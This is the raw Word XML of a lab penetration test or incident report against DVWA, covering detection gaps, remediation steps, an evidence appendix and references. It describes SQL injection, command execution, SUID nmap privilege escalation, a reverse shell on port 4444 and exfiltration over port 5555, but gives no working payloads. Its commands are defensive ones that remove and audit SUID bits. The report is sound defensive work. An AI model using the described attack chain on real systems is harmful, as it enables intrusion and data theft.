      <w:tr w:rsidR="00260F7B" w14:paraId="2AE41572" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14AE456E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No SUID auditing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CAA4348" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Routine integrity checks should flag </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> having SUID set — it does not need elevated permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="291FF229" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B178CA9" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No process monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="217BE57F" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>A shell spawned by the web server process (www-data) should be anomalous and alert-worthy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="6A1DB1AB" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4999CB23" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No DLP solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C12D90E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sensitive file transfer over raw TCP should have been detected and blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="3DC13F02" w14:textId="77777777" w:rsidTr="00F63671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3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1035E72F" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>No egress firewall rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6319" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EF2A56D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Outbound connections should be restricted to only necessary ports (80, 443 etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="399B05AC" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B355813" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18809A69" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Immediate Actions (Fix Now)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B068E4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 xml:space="preserve">Remove the SUID bit from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> u-s /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — audit all SUID binaries with find / -perm -4000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4B5E4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Patch the SQL injection vulnerability by replacing string concatenation with parameterized queries / prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B2B51C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Disable or restrict the Command Execution functionality — sanitize all inputs that are passed to OS commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DABF60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Change all passwords whose hashes were exposed — enforce strong password policy going forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC954D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Short-Term Actions (Fix Soon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68287320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Deploy a Web Application Firewall (WAF) to detect and block SQL injection and command injection patterns in HTTP traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D58FC1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Implement network monitoring with alerts for unexpected outbound connections on non-standard ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F8C5FE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 xml:space="preserve">Replace unsalted MD5 password hashing with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or Argon2 with unique salts per password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D063E3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Apply principle of least privilege — web server account (www-data) should have no unnecessary system permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C94C14C" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Long-Term Actions (Build </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C86589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Implement a Data Loss Prevention (DLP) solution to detect and block sensitive data leaving the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC2C50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Add egress firewall rules — only allow outbound traffic on explicitly permitted ports (80, 443, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726CAFFB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Deploy a SIEM (Security Information and Event Management) solution to correlate logs in real time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA835DB" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671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Integrate SAST/DAST security testing into the development pipeline to catch vulnerabilities before deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8CD3A0" w14:textId="78B12EAC" w:rsidR="00260F7B" w:rsidRPr="00FE689B" w:rsidRDefault="00000000" w:rsidP="00FE689B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F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conduct regular penetration testing and security audits to proactively identify misconfigurations</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F6456" w14:textId="473B2DC9" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10. Evidence Appendi</w:t>
      </w:r>
      <w:r w:rsidR="00BE0F90">
        <w:t>x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60F7B" w14:paraId="21E9F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6CD90E75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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Evidence Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="5E0C88D3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60F7B" w14:paraId="19735B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8A5E1C9" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00BE0F90" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE0F90">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lab_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE0F90">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>capture.pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ED3ABD1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Full network packet capture of the entire attack — all stages recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="2AA690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9A5542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NmapScan.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30C5ADBA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Wireshark filter showing Nmap SYN scan packets from 192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="7CD11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EF9BF4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ALLSQLinjectionpayload.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D3EC9D0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Wireshark HTTP filter showing UNION SELECT payloads in HTTP requests to DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="07047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BF299C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Reverseshell4444.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CAC3F48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Wireshark port 4444 filter showing reverse shell TCP session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="7118C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9C433E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FileTransfer5555.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FCC7106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Wireshark port 5555 filter showing data exfiltration TCP session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="4B5637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E2FCFB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httpcap.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68101082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Wireshark HTTP filter showing Nmap scripting engine + DVWA web traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="23759F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9ECEE7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4444.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78745F36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Detailed view of reverse shell session with real timestamps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="027B4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26234CA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auth.log (filtered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C902F81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System authentication log — SSH session from attacker IP confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="32BCC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E635EC0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access.log.1 (filtered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5536CF55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Web server access log — Nmap scripting engine + DVWA requests confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="341CE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F936985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DVWA-SQLi-Pentest-Report.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2543C658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Detailed SQL injection finding — Low/Medium/High level analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="70C03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49E05EA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Privilege-Escalation-Finding.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D55D459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 xml:space="preserve">Detailed SUID </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE0F90">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE0F90">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> privilege escalation finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="78FA13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9AC8181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Data-Exfiltration-Finding.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09F0E126" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00BE0F90" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE0F90">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Detailed data exfiltration finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CCBAF4F" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>11. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D112306" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00BE0F90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BE0F90">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Framework — attack.mitre.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35794EEF" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00BE0F90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BE0F90">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OWASP Top 10 2021 — A03: Injection, A05: Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D5F1AE" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00BE0F90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BE0F90">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE0F90">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE0F90">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE0F90">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID privilege escalation (gtfobins.github.io)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5654B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00BE0F90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BE0F90">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NIST SP 800-61 — Computer Security Incident Handling Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BDA38" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00BE0F90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BE0F90">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CWE-89: SQL Injection, CWE-78: OS Command Injection, CWE-250: Unnecessary Privileges</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00260F7B" w:rsidRPr="00BE0F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31727"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBC020AA"/>
    <w:lvl w:ilvl="0" w:tplc="8EC0F3D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="43C42EEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C11CC7D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B6E4F782">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BB9244EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E586EC54">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0C4E52B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C27ED0B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F2A89A6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="228617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F7B"/>
    <w:rsid w:val="00260F7B"/>
    <w:rsid w:val="00BE0F90"/>
    <w:rsid w:val="00E769A8"/>
    <w:rsid w:val="00F63671"/>
    <w:rsid w:val="00FE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6A3C"/>
  <w15:docId w15:val="{9E3A97B2-89F3-45B1-B51F-ACC95DB0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2095</Words>
  <Characters>11944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SHARMA</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-08T11:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-11T04:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>